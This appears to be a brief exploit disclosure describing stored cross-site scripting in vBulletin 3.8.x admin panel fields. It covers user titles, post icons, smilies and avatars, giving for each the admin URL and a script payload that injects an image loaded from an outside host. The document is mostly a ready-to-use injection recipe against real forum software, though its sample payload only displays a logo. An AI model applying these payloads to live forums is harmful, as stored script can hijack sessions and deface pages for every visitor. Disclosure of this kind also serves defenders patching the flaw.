vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members

These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.

1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.

2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif.  use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2.  use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>

4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>



The-0utl4w
http://Aria-Security.com
/* the-0utl4w.com